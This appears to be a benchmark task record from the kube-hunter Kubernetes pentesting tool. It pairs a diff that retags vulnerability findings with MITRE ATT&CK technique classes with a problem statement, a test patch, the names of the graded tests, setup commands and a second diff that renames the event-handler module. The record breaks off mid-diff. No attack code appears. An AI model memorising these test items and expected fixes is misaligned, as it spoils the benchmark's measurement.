GeneralSensitiveInformationTechnique, + GeneralPersistenceTechnique, + ListK8sSecretsTechnique, + ExposedSensitiveInterfacesTechnique, ) logger = logging.getLogger(__name__) @@ -29,7 +29,7 @@ class EtcdRemoteWriteAccessEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote Write Access Event", - category=RemoteCodeExec, + category=GeneralPersistenceTechnique, vid="KHV031", ) self.evidence = write_res @@ -43,7 +43,7 @@ class EtcdRemoteReadAccessEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote Read Access Event", - category=AccessRisk, + category=ListK8sSecretsTechnique, vid="KHV032", ) self.evidence = keys @@ -58,7 +58,7 @@ class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd Remote version disclosure", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV033", ) self.evidence = version @@ -74,7 +74,7 @@ class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event): self, KubernetesCluster, name="Etcd is accessible using insecure connection (HTTP)", - category=UnauthenticatedAccess, + category=ExposedSensitiveInterfacesTechnique, vid="KHV034", ) self.evidence = version diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index 3ff85b8..c67336c 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -16,9 +16,12 @@ from kube_hunter.core.types import ( ActiveHunter, KubernetesCluster, Kubelet, - InformationDisclosure, - RemoteCodeExec, - AccessRisk, + ExposedSensitiveInterfacesTechnique, + ExecIntoContainerTechnique, + GeneralDefenseEvasionTechnique, + GeneralSensitiveInformationTechnique, + PrivilegedContainerTechnique, + AccessKubeletAPITechnique, ) from kube_hunter.modules.discovery.kubelet import ( ReadOnlyKubeletEvent, @@ -35,7 +38,7 @@ class ExposedPodsHandler(Vulnerability, Event): def __init__(self, pods): Vulnerability.__init__( - self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure, vid="KHV052" + self, component=Kubelet, name="Exposed Pods", category=AccessKubeletAPITechnique, vid="KHV052" ) self.pods = pods self.evidence = f"count: {len(self.pods)}" @@ -50,7 +53,7 @@ class AnonymousAuthEnabled(Vulnerability, Event): self, component=Kubelet, name="Anonymous Authentication", - category=RemoteCodeExec, + category=ExposedSensitiveInterfacesTechnique, vid="KHV036", ) @@ -63,7 +66,7 @@ class ExposedContainerLogsHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Container Logs", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV037", ) @@ -77,7 +80,7 @@ class ExposedRunningPodsHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Running Pods", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV038", ) self.count = count @@ -92,7 +95,7 @@ class ExposedExecHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Exec On Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV039", ) @@ -105,7 +108,7 @@ class ExposedRunHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Run Inside Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV040", ) @@ -118,7 +121,7 @@ class ExposedPortForwardHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Port Forward", - category=RemoteCodeExec, + category=GeneralDefenseEvasionTechnique, vid="KHV041", ) @@ -132,7 +135,7 @@ class ExposedAttachHandler(Vulnerability, Event): self, component=Kubelet, name="Exposed Attaching To Container", - category=RemoteCodeExec, + category=ExecIntoContainerTechnique, vid="KHV042", ) @@ -146,7 +149,7 @@ class ExposedHealthzHandler(Vulnerability, Event): self, component=Kubelet, name="Cluster Health Disclosure", - category=InformationDisclosure, + category=GeneralSensitiveInformationTechnique, vid="KHV043", ) self.status = status @@ -163,7 +166,7 @@ the whole cluster""" self, component=KubernetesCluster, name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port", - category=AccessRisk, + category=PrivilegedContainerTechnique, vid="KHV051", ) self.exposed_existing_privileged_containers = exposed_existing_privileged_containers @@ -178,7 +181,7 @@ class PrivilegedContainers(Vulnerability, Event): self, component=KubernetesCluster, name="Privileged Container", - category=AccessRisk, + category=PrivilegedContainerTechnique, vid="KHV044", ) self.containers = containers @@ -193,7 +196,7 @@ class ExposedSystemLogs(Vulnerability, Event): self, component=Kubelet, name="Exposed System Logs", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV045", ) @@ -206,7 +209,7 @@ class ExposedKubeletCmdline(Vulnerability, Event): self, component=Kubelet, name="Exposed Kubelet Cmdline", - category=InformationDisclosure, + category=AccessKubeletAPITechnique, vid="KHV046", ) self.cmdline = cmdline diff --git a/kube_hunter/modules/hunting/mounts.py b/kube_hunter/modules/hunting/mounts.py index 6120f59..8eb42d7 100644 --- a/kube_hunter/modules/hunting/mounts.py +++ b/kube_hunter/modules/hunting/mounts.py @@ -5,12 +5,7 @@ import uuid from kube_hunter.conf import get_config from kube_hunter.core.events import handler from kube_hunter.core.events.types import Event, Vulnerability -from kube_hunter.core.types import ( - ActiveHunter, - Hunter, - KubernetesCluster, - PrivilegeEscalation, -) +from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique from kube_hunter.modules.hunting.kubelet import ( ExposedPodsHandler, ExposedRunHandler, @@ -28,7 +23,7 @@ class WriteMountToVarLog(Vulnerability, Event): self, KubernetesCluster, "Pod With Mount To /var/log", - category=PrivilegeEscalation, + category=HostPathMountPrivilegeEscalationTechnique, vid="KHV047", ) self.pods = pods @@ -44,7 +39,7 @@ class DirectoryTraversalWithKubelet(Vulnerability, Event): self, KubernetesCluster, "Root Traversal Read On The Kubelet", - category=PrivilegeEscalation, + category=HostPathMountPrivilegeEscalationTechnique, ) self.output = output self.evidence = f"output: {self.output}" diff --git a/kube_hunter/modules/hunting/proxy.py b/kube_hunter/modules/hunting/proxy.py index 4f5a7af..0570d3d 100644 --- a/kube_hunter/modules/hunting/proxy.py +++ b/kube_hunter/modules/hunting/proxy.py @@ -10,7 +10,7 @@ from kube_hunter.core.types import ( ActiveHunter, Hunter, KubernetesCluster, - InformationDisclosure, + ConnectFromProxyServerTechnique, ) from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent from kube_hunter.modules.discovery.proxy import KubeProxyEvent @@ -26,7 +26,7 @@ class KubeProxyExposed(Vulnerability, Event): self, KubernetesCluster, "Proxy Exposed", - category=InformationDisclosure, + category=ConnectFromProxyServerTechnique, vid="KHV049", ) @@ -123,5 +123,6 @@ class K8sVersionDisclosureProve(ActiveHunter): version=version_metadata["gitVersion"], from_endpoint="/version", extra_info="on kube-proxy", + category=ConnectFromProxyServerTechnique, ) ) diff --git a/kube_hunter/modules/hunting/secrets.py b/kube_hunter/modules/hunting/secrets.py index b505e32..36e09d7 100644 --- a/kube_hunter/modules/hunting/secrets.py +++ b/kube_hunter/modules/hunting/secrets.py @@ -3,7 +3,7 @@ import os from kube_hunter.core.events import handler from kube_hunter.core.events.types import Vulnerability, Event -from kube_hunter.core.types import Hunter, KubernetesCluster, AccessRisk +from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique from kube_hunter.modules.discovery.hosts import RunningAsPodEvent logger = logging.getLogger(__name__) @@ -17,7 +17,7 @@ class ServiceAccountTokenAccess(Vulnerability, Event): self, KubernetesCluster, name="Read access to pod's service account token", - category=AccessRisk, + category=AccessContainerServiceAccountTechnique, vid="KHV050", ) self.evidence = evidence @@ -31,7 +31,7 @@ class SecretsAccess(Vulnerability, Event): self, component=KubernetesCluster, name="Access to pod's secrets", - category=AccessRisk, + category=AccessContainerServiceAccountTechnique, ) self.evidence = evidence diff --git a/kube_hunter/modules/report/base.py b/kube_hunter/modules/report/base.py index d8fed44..3382c35 100644 --- a/kube_hunter/modules/report/base.py +++ b/kube_hunter/modules/report/base.py @@ -36,7 +36,7 @@ class BaseReporter: { "location": vuln.location(), "vid": vuln.get_vid(), - "category": vuln.category.name, + "category": vuln.category.get_name(), "severity": vuln.get_severity(), "vulnerability": vuln.get_name(), "description": vuln.explain(), diff --git a/kube_hunter/modules/report/plain.py b/kube_hunter/modules/report/plain.py index b2eb573..913929c 100644 --- a/kube_hunter/modules/report/plain.py +++ b/kube_hunter/modules/report/plain.py @@ -83,7 +83,7 @@ class PlainReporter(BaseReporter): column_names = [ "ID", "Location", - "Category", + "MITRE Category", "Vulnerability", "Description", "Evidence", @@ -91,7 +91,7 @@ class PlainReporter(BaseReporter): vuln_table = PrettyTable(column_names, hrules=ALL) vuln_table.align = "l" vuln_table.max_width = MAX_TABLE_WIDTH - vuln_table.sortby = "Category" + vuln_table.sortby = "MITRE Category" vuln_table.reversesort = True vuln_table.padding_width = 1 vuln_table.header_style = "upper" @@ -101,10 +101,11 @@ class PlainReporter(BaseReporter): evidence = str(vuln.evidence) if len(evidence) > EVIDENCE_PREVIEW: evidence = evidence[:EVIDENCE_PREVIEW] + "..." + row = [ vuln.get_vid(), vuln.location(), - vuln.category.name, + vuln.category.get_name(), vuln.get_name(), vuln.explain(), evidence,
Feature: Changed vulnerability categories to support MITRE ATT&CK ## Description kube-hunter was one of the first projects that offered a Pentesting solution for kubernetes. This arose a lot of new problems as this field of "hacking" kubernetes was at it's really early stages, so we had room for innovative new ideas. We decided then to categorize kube-hunter's innovative techniques with a simple category system: ```bash InformationDisclosure DenialOfService RemoteCodeExec IdentityTheft PrivilegeEscalation AccessRisk UnauthenticatedAccess ``` Time passed and new tools and blogs were published around the kuberentes security world. A new [MITRE ATT&CK matrix ](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/) was published for kubernetes environments. which did a pretty good job of covering the techniques (mostly already implemented in kube-hunter) used while hacking a kubernetes environment. We know a good category system when we see it, So we decided to move for that system. ### Code changes * A bit of package architecture redesign of the `core.types` sub package * Created a new module `core.types.categories` which defines new categories implemented for this change * new class `MITRECategory` -> base class for all mitre categories * new class `CVECategory` -> All cve vulnerabilities are not part of the new category system. so they will inherit from this base class For every part of the threat matrix, we have a python class. #### Example CAP_NET_RAW is enabled inside a pod. The vulnerability object now looks like this: ```python class CapNetRawEnabled(Event, Vulnerability): def __init__(self): Vulnerability.__init__( self, KubernetesCluster, name="CAP_NET_RAW Enabled", category=ARPPoisoningTechnique, ) ``` let's take a look at: `ARPPoisoningTechnique` it inherits from `LateralMovementCategory` which inherits from `MITRECategory` Because of the class method implemented inside `MITRECategory` we can now do something like this: ``` >> ARPPoisoningTechnique.get_name() "Lateral Movement // ARP poisoning and IP spoofing" >> # Automatically discovers the MITRE father category, and returns a full representation of the technique cube in the matrix ``` ### BEFORE ```bash +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | ID | LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | KHV030 | Local to Pod (kube- | Identity Theft | Possible DNS Spoof | A malicious pod | kube-dns at: | | | hunter-2krcf) | | | running on the | 172.17.0.3 | | | | | | cluster could | | | | | | | potentially run a | | | | | | | DNS Spoof attack | | | | | | | and perform a | | | | | | | MITM attack on | | | | | | | applications running | | | | | | | in the cluster. | | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ ``` ### AFTER ```bash +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | ID | LOCATION | MITRE CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ | KHV030 | Local to Pod (kube- | Lateral Movement // | Possible DNS Spoof | A malicious pod | kube-dns at: | | | hunter-2krcf) | CoreDNS poisoning | | running on the | 172.17.0.3 | | | | | | cluster could | | | | | | | potentially run a | | | | | | | DNS Spoof attack | | | | | | | and perform a | | | | | | | MITM attack on | | | | | | | applications running | | | | | | | in the cluster. | | +--------+----------------------+----------------------+----------------------+----------------------+----------------------+ ``` ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an active issue in the repository. - [x] I have added automated testing to cover this case.
**Title** Align vulnerability categories with MITRE ATT&CK and CVE classifications **Problem** The tool still used a legacy set of generic categories that did not reflect the MITRE ATT&CK matrix or CVE‑specific groupings, leading to ambiguous reporting and incorrect severity assignments. The plain‑text reporter also displayed only the raw category name, missing the full MITRE technique hierarchy. **Root Cause** Category definitions and severity mapping were hard‑coded to the old enumeration, and the reporting layer accessed a simple name attribute instead of a descriptive identifier. **Fix / Expected Behavior** - Introduce a structured hierarchy for MITRE ATT&CK techniques and a separate hierarchy for CVE‑based categories. - Update all vulnerability classes to reference the appropriate new technique or CVE category. - Refresh the severity lookup to use the new category classes. - Adjust the reporting logic to display the full MITRE technique name (category // technique). - Minor documentation formatting tweak for consistency. **Risk & Validation** - Verify that every vulnerability now reports a MITRE or CVE category and that severity values match the updated mapping. - Run the full test suite and confirm that the plain‑text report sorts and displays the “MITRE Category” column correctly. - Perform manual scans of common clusters to ensure no regression in detection or event publishing.
474
aquasecurity/kube-hunter
diff --git a/tests/hunting/test_apiserver_hunter.py b/tests/hunting/test_apiserver_hunter.py index 7cd6b20..774d485 100644 --- a/tests/hunting/test_apiserver_hunter.py +++ b/tests/hunting/test_apiserver_hunter.py @@ -1,4 +1,5 @@ # flake8: noqa: E402 +from kube_hunter.core.types.vulnerabilities import AccessK8sApiServerTechnique import requests_mock import time @@ -21,7 +22,7 @@ from kube_hunter.modules.hunting.apiserver import ( from kube_hunter.modules.hunting.apiserver import ApiServerPassiveHunterFinished from kube_hunter.modules.hunting.apiserver import CreateANamespace, DeleteANamespace from kube_hunter.modules.discovery.apiserver import ApiServer -from kube_hunter.core.types import UnauthenticatedAccess, InformationDisclosure +from kube_hunter.core.types import ExposedSensitiveInterfacesTechnique, AccessK8sApiServerTechnique from kube_hunter.core.events import handler counter = 0 @@ -181,10 +182,10 @@ class test_ListClusterRoles: class test_ServerApiAccess: def __init__(self, event): print("ServerApiAccess") - if event.category == UnauthenticatedAccess: + if event.category == ExposedSensitiveInterfacesTechnique: assert event.auth_token is None else: - assert event.category == InformationDisclosure + assert event.category == AccessK8sApiServerTechnique assert event.auth_token == "so-secret" global counter counter += 1
[ "tests/hunting/test_apiserver_hunter.py::test_ApiServerToken", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServer", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServerActive" ]
[]
Class: ExposedSensitiveInterfacesTechnique Location: kube_hunter.core.types.vulnerabilities Inputs: None (instantiated implicitly as a class reference; inherits from InitialAccessCategory → MITRECategory) Outputs: Used as a category identifier; supports identity comparison (`event.category == ExposedSensitiveInterfacesTechnique`) and inherits `MITRECategory.get_name()` for full MITRE name representation. Description: Represents the MITRE ATT&CK “Exposed sensitive interfaces” technique (Initial Access) and is used to tag vulnerabilities that expose unauthenticated interfaces. Class: AccessK8sApiServerTechnique Location: kube_hunter.core.types.vulnerabilities Inputs: None (instantiated implicitly as a class reference; inherits from DiscoveryCategory → MITRECategory) Outputs: Used as a category identifier; supports identity comparison (`event.category == AccessK8sApiServerTechnique`) and inherits `MITRECategory.get_name()` for full MITRE name representation. Description: Represents the MITRE ATT&CK “Access the K8S API Server” technique (Discovery) and is used to tag vulnerabilities that involve authenticated access to the Kubernetes API server.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/hunting/test_apiserver_hunter.py" }
{ "num_modified_files": 22, "num_modified_lines": 405, "pr_author": "danielsagi", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue introduces MITRE ATT&CK based vulnerability categories, refactors the core type system, and updates all modules to use the new category classes. The provided test patch checks that the API server hunting module now uses the new categories, and the repository changes include the required classes and imports, so the tests align with the stated requirements. No signals of B‑category problems (no external dependencies, implicit naming, or ambiguous specs) are present. Therefore the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
9ce385a19071ea2e639419ba87c14bd18d0faa93
2022-05-11 13:51:43
CLAassistant: [![CLA assistant check](https://cla-assistant.io/pull/badge/not_signed)](https://cla-assistant.io/aquasecurity/kube-hunter?pullRequest=504) <br/>Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our [Contributor License Agreement](https://cla-assistant.io/aquasecurity/kube-hunter?pullRequest=504) before we can accept your contribution.<br/><sub>You have signed the CLA already but the status is still pending? Let us [recheck](https://cla-assistant.io/check/aquasecurity/kube-hunter?pullRequest=504) it.</sub>
aquasecurity__kube-hunter-504
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 54b4bce..747f8cd 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -39,7 +39,7 @@ jobs: password: ${{ secrets.ECR_SECRET_ACCESS_KEY }} - name: Get version id: get_version - uses: crazy-max/ghaction-docker-meta@v1 + uses: crazy-max/ghaction-docker-meta@v3 with: images: ${{ env.REP }} tag-semver: | diff --git a/job.yaml b/job.yaml index 2d9e50f..84ce485 100644 --- a/job.yaml +++ b/job.yaml @@ -5,11 +5,13 @@ metadata: name: kube-hunter spec: template: + metadata: + labels: + app: kube-hunter spec: containers: - name: kube-hunter - image: aquasec/kube-hunter + image: aquasec/kube-hunter:v0.6.7 command: ["kube-hunter"] args: ["--pod"] restartPolicy: Never - backoffLimit: 4 diff --git a/kube_hunter/README.md b/kube_hunter/README.md index 8c4b70f..de5fa0c 100644 --- a/kube_hunter/README.md +++ b/kube_hunter/README.md @@ -76,7 +76,7 @@ in order to prevent circular dependency bug. Following the above example, let's figure out the imports: ```python from kube_hunter.core.types import Hunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent @@ -206,7 +206,7 @@ __Make sure to return the event from the execute method, or the event will not g For example, if you don't want to hunt services found on a localhost IP, you can create the following module, in the `kube_hunter/modules/report/` ```python -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Service, EventFilterBase @handler.subscribe(Service) @@ -222,7 +222,7 @@ That means other Hunters that are subscribed to this Service will not get trigge That opens up a wide variety of possible operations, as this not only can __filter out__ events, but you can actually __change event attributes__, for example: ```python -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.types import InformationDisclosure from kube_hunter.core.events.types import Vulnerability, EventFilterBase diff --git a/kube_hunter/__main__.py b/kube_hunter/__main__.py index 9fda820..e091663 100755 --- a/kube_hunter/__main__.py +++ b/kube_hunter/__main__.py @@ -39,7 +39,7 @@ set_config(config) # Running all other registered plugins before execution pm.hook.load_plugin(args=args) -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import HuntFinished, HuntStarted from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent from kube_hunter.modules.report import get_reporter, get_dispatcher diff --git a/kube_hunter/core/events/__init__.py b/kube_hunter/core/events/__init__.py index 8f98709..a8c20ab 100644 --- a/kube_hunter/core/events/__init__.py +++ b/kube_hunter/core/events/__init__.py @@ -1,3 +1,2 @@ # flake8: noqa: E402 -from .handler import EventQueue, handler from . import types diff --git a/kube_hunter/core/events/handler.py b/kube_hunter/core/events/event_handler.py similarity index 100% rename from kube_hunter/core/events/handler.py rename to kube_hunter/core/events/event_handler.py diff --git a/kube_hunter/core/types/hunters.py b/kube_hunter/core/types/hunters.py index 0d7e410..ede3c13 100644 --- a/kube_hunter/core/types/hunters.py +++ b/kube_hunter/core/types/hunters.py @@ -19,7 +19,7 @@ class HunterBase: def publish_event(self, event): # Import here to avoid circular import from events package. # imports are cached in python so this should not affect runtime - from ..events import handler # noqa + from ..events.event_handler import handler # noqa handler.publish_event(event, caller=self) diff --git a/kube_hunter/modules/discovery/apiserver.py b/kube_hunter/modules/discovery/apiserver.py index af9f4e1..729a55d 100644 --- a/kube_hunter/modules/discovery/apiserver.py +++ b/kube_hunter/modules/discovery/apiserver.py @@ -2,7 +2,7 @@ import logging import requests from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase from kube_hunter.conf import get_config diff --git a/kube_hunter/modules/discovery/dashboard.py b/kube_hunter/modules/discovery/dashboard.py index ac7e610..bdbc400 100644 --- a/kube_hunter/modules/discovery/dashboard.py +++ b/kube_hunter/modules/discovery/dashboard.py @@ -3,7 +3,7 @@ import logging import requests from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, OpenPortEvent, Service from kube_hunter.core.types import Discovery diff --git a/kube_hunter/modules/discovery/etcd.py b/kube_hunter/modules/discovery/etcd.py index 291e09b..d96d396 100644 --- a/kube_hunter/modules/discovery/etcd.py +++ b/kube_hunter/modules/discovery/etcd.py @@ -1,4 +1,4 @@ -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, OpenPortEvent, Service from kube_hunter.core.types import Discovery diff --git a/kube_hunter/modules/discovery/hosts.py b/kube_hunter/modules/discovery/hosts.py index 760211e..86c4a48 100644 --- a/kube_hunter/modules/discovery/hosts.py +++ b/kube_hunter/modules/discovery/hosts.py @@ -9,7 +9,7 @@ from netifaces import AF_INET, ifaddresses, interfaces, gateways from kube_hunter.conf import get_config from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique diff --git a/kube_hunter/modules/discovery/kubectl.py b/kube_hunter/modules/discovery/kubectl.py index 5415b1c..38e52e0 100644 --- a/kube_hunter/modules/discovery/kubectl.py +++ b/kube_hunter/modules/discovery/kubectl.py @@ -2,7 +2,7 @@ import logging import subprocess from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import HuntStarted, Event logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/discovery/kubelet.py b/kube_hunter/modules/discovery/kubelet.py index 9b9ac1a..e790899 100644 --- a/kube_hunter/modules/discovery/kubelet.py +++ b/kube_hunter/modules/discovery/kubelet.py @@ -5,7 +5,7 @@ from enum import Enum from kube_hunter.conf import get_config from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import OpenPortEvent, Event, Service urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) diff --git a/kube_hunter/modules/discovery/ports.py b/kube_hunter/modules/discovery/ports.py index c1c355e..db128c9 100644 --- a/kube_hunter/modules/discovery/ports.py +++ b/kube_hunter/modules/discovery/ports.py @@ -2,7 +2,7 @@ import logging from socket import socket from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/discovery/proxy.py b/kube_hunter/modules/discovery/proxy.py index 1b595a4..8394b83 100644 --- a/kube_hunter/modules/discovery/proxy.py +++ b/kube_hunter/modules/discovery/proxy.py @@ -3,7 +3,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.core.types import Discovery -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Service, Event, OpenPortEvent logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index 6c0d0a9..a0cf9f5 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -5,7 +5,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure diff --git a/kube_hunter/modules/hunting/apiserver.py b/kube_hunter/modules/hunting/apiserver.py index 8af3dd8..2096678 100644 --- a/kube_hunter/modules/hunting/apiserver.py +++ b/kube_hunter/modules/hunting/apiserver.py @@ -5,7 +5,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.modules.discovery.apiserver import ApiServer -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster from kube_hunter.core.types.vulnerabilities import ( diff --git a/kube_hunter/modules/hunting/capabilities.py b/kube_hunter/modules/hunting/capabilities.py index 656618b..c1ca7d6 100644 --- a/kube_hunter/modules/hunting/capabilities.py +++ b/kube_hunter/modules/hunting/capabilities.py @@ -2,7 +2,7 @@ import socket import logging from kube_hunter.modules.discovery.hosts import RunningAsPodEvent -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster diff --git a/kube_hunter/modules/hunting/certificates.py b/kube_hunter/modules/hunting/certificates.py index ee60c98..fa8397b 100644 --- a/kube_hunter/modules/hunting/certificates.py +++ b/kube_hunter/modules/hunting/certificates.py @@ -4,7 +4,7 @@ import base64 import re from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, Service logger = logging.getLogger(__name__) diff --git a/kube_hunter/modules/hunting/cves.py b/kube_hunter/modules/hunting/cves.py index b0740a3..137a370 100644 --- a/kube_hunter/modules/hunting/cves.py +++ b/kube_hunter/modules/hunting/cves.py @@ -2,7 +2,7 @@ import logging from packaging import version from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import K8sVersionDisclosure, Vulnerability, Event from kube_hunter.core.types import ( diff --git a/kube_hunter/modules/hunting/dashboard.py b/kube_hunter/modules/hunting/dashboard.py index 956e120..445b8cb 100644 --- a/kube_hunter/modules/hunting/dashboard.py +++ b/kube_hunter/modules/hunting/dashboard.py @@ -4,7 +4,7 @@ import requests from kube_hunter.conf import get_config from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent diff --git a/kube_hunter/modules/hunting/etcd.py b/kube_hunter/modules/hunting/etcd.py index f087567..3a4dd6d 100644 --- a/kube_hunter/modules/hunting/etcd.py +++ b/kube_hunter/modules/hunting/etcd.py @@ -2,7 +2,7 @@ import logging import requests from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent from kube_hunter.core.types import ( ActiveHunter, diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index c67336c..6f9e8f6 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -9,7 +9,7 @@ import urllib3 import uuid from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import ( Hunter, diff --git a/kube_hunter/modules/hunting/mounts.py b/kube_hunter/modules/hunting/mounts.py index 8eb42d7..8714699 100644 --- a/kube_hunter/modules/hunting/mounts.py +++ b/kube_hunter/modules/hunting/mounts.py @@ -3,7 +3,7 @@ import re import uuid from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique from kube_hunter.modules.hunting.kubelet import ( diff --git a/kube_hunter/modules/hunting/proxy.py 